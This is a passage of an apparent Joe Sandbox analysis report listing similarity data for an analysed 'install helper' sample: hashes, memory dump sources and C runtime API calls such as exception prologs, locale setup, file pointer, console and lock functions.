                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 3332196525-1866435925
                                        • Opcode ID: 64619c379e489257dc3080b166c6f0e9f8bb18f908f761d5eb4b92ae4713aff1
                                        • Instruction ID: cca668e8afd33ae641af728fda7109410e2c10248bf47cd8ac50aacf4b8c34e7
                                        • Opcode Fuzzy Hash: 64619c379e489257dc3080b166c6f0e9f8bb18f908f761d5eb4b92ae4713aff1
                                        • Instruction Fuzzy Hash: 9441D6B0E003498FDB00CF64C8457AEBBB4FF48314F148268E915AB791E775A985CF92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $CK$CK
                                        • API String ID: 3519838083-2957773085
                                        • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                        • Instruction ID: 5daa5863b15bbf2b11c41a9c6b6e8bbae05261ec419b8a7210210e06d7885dab
                                        • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                        • Instruction Fuzzy Hash: 6421A470E41215CBCF04DFE9C4801EFF7B6FF94304F94462AC422A7BA1D7749A268A62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0$LrJ$x
                                        • API String ID: 3519838083-658305261
                                        • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                        • Instruction ID: 83f7054a578ba97c579bda875f6fa2958430b7da584ff5703f4dd17a5ca300d6
                                        • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                        • Instruction Fuzzy Hash: FB21A132D01529EBCF04CBD8CA90AEDB7B5EF99308F21105AE40577AA0DB755E08CBA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD62ECC
                                          • Part of subcall function 6CD4D58A: __EH_prolog.LIBCMT ref: 6CD4D58F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :hJ$dJ$xJ
                                        • API String ID: 3519838083-2437443688
                                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction ID: b724686fb8db968f341e285c2e8bbca51d557bdde0297eb47cea6697c5253cdb
                                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction Fuzzy Hash: 2721C9B0801B50CFC760CF6AC14429ABBF4BF2A708B50C95FC0AA97B11D7B4A608CF59
                                        APIs
                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CD19EF0,6CBD1DEA,00008000,6CD19EF0,?,?,?,6CD19A9F,6CD19EF0,?,00000000,6CBD1DEA), ref: 6CD19BE9
                                        • GetLastError.KERNEL32(?,?,?,6CD19A9F,6CD19EF0,?,00000000,6CBD1DEA,?,6CD234BE,6CD19EF0,000000FF,000000FF,00000002,00008000,6CD19EF0), ref: 6CD19BF3
                                        • __dosmaperr.LIBCMT ref: 6CD19BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 2336955059-4022487301
                                        • Opcode ID: 8dea3666079ea9a846c55d83d8b927ec9e61047e20607b486018da1a061d3f93
                                        • Instruction ID: b5b17b4760f2332c8d61a8e84434799eb7213f685789e127757b31caaa555392
                                        • Opcode Fuzzy Hash: 8dea3666079ea9a846c55d83d8b927ec9e61047e20607b486018da1a061d3f93
                                        • Instruction Fuzzy Hash: 8501FC32714514AFCB058F6DDC4589E7B7EEBC6338B280208F555D7AA0EB71D90187A0
                                        APIs
                                        • AcquireSRWLockExclusive.KERNEL32(6CE0266C,?,652EF5AA,6CBD230E,6CE0230C), ref: 6CD05927
                                        • ReleaseSRWLockExclusive.KERNEL32(6CE0266C), ref: 6CD0595A
                                        • WakeAllConditionVariable.KERNEL32(6CE02668), ref: 6CD05965
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                        • String ID: l&l
                                        • API String ID: 1466638765-3573850595
                                        • Opcode ID: e4f5269d5f9c790e84cdab67d62e78e144b9a28267d5cdc2b1313a3f313916f1
                                        • Instruction ID: d5a923301cbdb64db077dcbc56fed05ea932f2576649e0d76256289542e85ba3
                                        • Opcode Fuzzy Hash: e4f5269d5f9c790e84cdab67d62e78e144b9a28267d5cdc2b1313a3f313916f1
                                        • Instruction Fuzzy Hash: E1F01CB8B01140DBCB059F58E88CC947BB8EB4B315B00802EE90A87712CB315811CFE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <J$DJ$HJ$TJ$]
                                        • API String ID: 0-686860805
                                        • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                        • Instruction ID: a271f4157ef53dded5cfb2ac595df20018df211a341477243f019c5e1cf53691
                                        • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                        • Instruction Fuzzy Hash: 4E41D9B0D02259EFCF14CBA1D8908EEB774AF12208B90916AD02567D70DB35EA5ECB61
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                        • Instruction ID: e8896e4c07c5c7ce0cbeff57636f9e23b941256c8bcd5fdd3d4b3b95c1d4b3d4
                                        • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                        • Instruction Fuzzy Hash: 031193B6640244BFEF255BA4CC40EBFBBBDEB85748F50881DB14156670D671BC648770
                                        APIs
                                        • GetLastError.KERNEL32(00000008,?,00000000,6CD17273), ref: 6CD137D7
                                        • _free.LIBCMT ref: 6CD13834
                                        • _free.LIBCMT ref: 6CD1386A
                                        • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CD13875
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast_free
                                        • String ID:
                                        • API String ID: 2283115069-0
                                        • Opcode ID: d0fa81296faaeaa377ab16f8135f5cf8d7316c651817656ec7ff65d4bc11a087
                                        • Instruction ID: 84181271f6f889140e863b914a345b2b79460d9d4e9a57c6d9d1d8684529d359
                                        • Opcode Fuzzy Hash: d0fa81296faaeaa377ab16f8135f5cf8d7316c651817656ec7ff65d4bc11a087
                                        • Instruction Fuzzy Hash: 3E11737270D201AAEB015BB97C84D5A6579ABC26BC7290768F12497FB0EF26CC1981B1
                                        APIs
                                        • WriteConsoleW.KERNEL32(00000000,?,6CD2350C,00000000,00000000,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0), ref: 6CD24CF1
                                        • GetLastError.KERNEL32(?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?,6CD19EF0,?,6CD1AB3C,6CD248D6), ref: 6CD24CFD
                                          • Part of subcall function 6CD24D4E: CloseHandle.KERNEL32(FFFFFFFE,6CD24D0D,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?,6CD19EF0), ref: 6CD24D5E
                                        • ___initconout.LIBCMT ref: 6CD24D0D
                                          • Part of subcall function 6CD24D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD24CCB,6CD2395E,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?), ref: 6CD24D42
                                        • WriteConsoleW.KERNEL32(00000000,?,6CD2350C,00000000,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?), ref: 6CD24D22
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: fa4b2c82c6903da9efc97bab2683200a965e8d67b543d231abad356d397686c2
                                        • Instruction ID: 022f4b4f9e9e92206fd0184dd135e237fcbd9b290c218ea675c6032aa8606983
                                        • Opcode Fuzzy Hash: fa4b2c82c6903da9efc97bab2683200a965e8d67b543d231abad356d397686c2
                                        • Instruction Fuzzy Hash: 58F0AC36A00118BBDF225FE5DC08A8A3F36FB4A7AAB144514FF1996631D772C8219BD0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD3C077
                                          • Part of subcall function 6CD3BFF5: __EH_prolog.LIBCMT ref: 6CD3BFFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :$\
                                        • API String ID: 3519838083-1166558509
                                        • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                        • Instruction ID: f7af41cb4153740d0d32be8e28070c5ca68c7ef72a639e30bbaa9be5894c13e4
                                        • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                        • Instruction Fuzzy Hash: EDE1E531900638DACB10EFA4C890BEEB7B0BF87318F10621AD45D6BAB0DB756549CB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aullrem
                                        • String ID: d%K
                                        • API String ID: 3415659256-3110269457
                                        • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                        • Instruction ID: 6c14c1658cd6411e1eeda2545708b3da21baad411c11ea4bf6489267d16f343a
                                        • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                        • Instruction Fuzzy Hash: 6D81A272A02209DFDF00CF58CD90BDEB7F6AF45348F24809AD854AB6A1D771D905CBA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: 8Q
                                        • API String ID: 2427045233-4022487301
                                        • Opcode ID: 9f454b0a4c4679a5fe5fae262d5d24f2a05c424cac1e3cc78301fa01060993f8
                                        • Instruction ID: 31e141ca5d9ad95dd2797b903b55e7a4aeb5f4d69f41d738205771d8375b8c35
                                        • Opcode Fuzzy Hash: 9f454b0a4c4679a5fe5fae262d5d24f2a05c424cac1e3cc78301fa01060993f8
                                        • Instruction Fuzzy Hash: 0371E635D0920ADFDB10CF55E848AEFB679AF4633CF144217EA5067EA0D7768885C760
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$hfJ
                                        • API String ID: 3519838083-1391159562
                                        • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                        • Instruction ID: b94a64d057de9e48d88089a6b1f61b350425c8dac799b37a489871d73aad8cec
                                        • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                        • Instruction Fuzzy Hash: 10914A70910219DFCB10DFAAC8809DEFBF4BF19308F54451EE45AA7AA0D770EA48CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD56C5D
                                          • Part of subcall function 6CD5561A: __EH_prolog.LIBCMT ref: 6CD5561F
                                          • Part of subcall function 6CD55A2E: __EH_prolog.LIBCMT ref: 6CD55A33
                                          • Part of subcall function 6CD56EA5: __EH_prolog.LIBCMT ref: 6CD56EAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: WZJ
                                        • API String ID: 3519838083-1089469559
                                        • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                        • Instruction ID: 90680a79da0aab558d6d87c2724f2190422cd58822e11a11b53732856f3c7640
                                        • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                        • Instruction Fuzzy Hash: E7816D35D01158DFCF15DFA4D990ADEBBB4AF19308F10809AE416A7BA0DB30AE19CB71
                                        APIs
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 6CBD2A76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ___std_exception_destroy
                                        • String ID: Jbx$Jbx
                                        • API String ID: 4194217158-1161259238
                                        • Opcode ID: b4d204af53a285d56d45a1fd3ce3f345ecba219649ccaa5b9bdfa767dc19483e
                                        • Instruction ID: 1b53a2ae604c64c5e3a9703b35cd55b7d328fd21b5aab5ec83186bf9668b4673
                                        • Opcode Fuzzy Hash: b4d204af53a285d56d45a1fd3ce3f345ecba219649ccaa5b9bdfa767dc19483e
                                        • Instruction Fuzzy Hash: 4C5137B1A00280DFCB10CF58D88469EBBB5FF89314F16856EE8499B751E335ED85CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: <dJ$Q
                                        • API String ID: 3519838083-2252229148
                                        • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                        • Instruction ID: c0be1d4238f964b5d13aa0559dae3e9f4cc51310027a9b40cc3273d73fe1e973
                                        • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                        • Instruction Fuzzy Hash: EF518171904219EFCF10EF98CC808EDB7B1BF49308F50852EE515ABA60D7359959CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $D^J
                                        • API String ID: 3519838083-3977321784
                                        • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                        • Instruction ID: dd4b07bed36779eb0829b19a8f3c59cc4a7c4d0f4cbeddf457e7d4a2f809ce82
                                        • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                        • Instruction Fuzzy Hash: 7F414CE4E04590EEEF229F2884D07F8BBA59B07248F948158C49607E75DB7415ABC3B0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CD234F6), ref: 6CD1BE3B
                                        • __dosmaperr.LIBCMT ref: 6CD1BE42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 1659562826-4022487301
                                        • Opcode ID: 94799ac124a03da9fddac83a1b14b407714f6dd460cce8a37843a84155a71dcf
                                        • Instruction ID: 04208267293207b411d11f9f92c83d192350af97f0800cf761f5d59c577b2283
                                        • Opcode Fuzzy Hash: 94799ac124a03da9fddac83a1b14b407714f6dd460cce8a37843a84155a71dcf
                                        • Instruction Fuzzy Hash: 914176F1718144BFD7158F68E880AA97FB5EF46348F184298E9818BFA2D331CC2187D0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: X&L$p|J
                                        • API String ID: 3519838083-2944591232
                                        • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                        • Instruction ID: 68797872b3994985483fd9f5e5ee22ddf26c4c19c04d1c5c8bb74e6f3fcf5190
                                        • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                        • Instruction Fuzzy Hash: AC314732B86519DBD7309B5CDE01BAA7771EB02328F50012BD950A7EF0CB70898ACA71
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0|J$`)L
                                        • API String ID: 3519838083-117937767
                                        • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                        • Instruction ID: d64817a103eda8f94a5a02c073525e0f7805fbb8284b053eab92639d57178dc9
                                        • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                        • Instruction Fuzzy Hash: 6F419331601785EFCF219F60C5947EABBE2FF46208F00442EE49A9B770CB716945CBA1
                                        APIs
                                        Strings
                                        Memory Dump Source
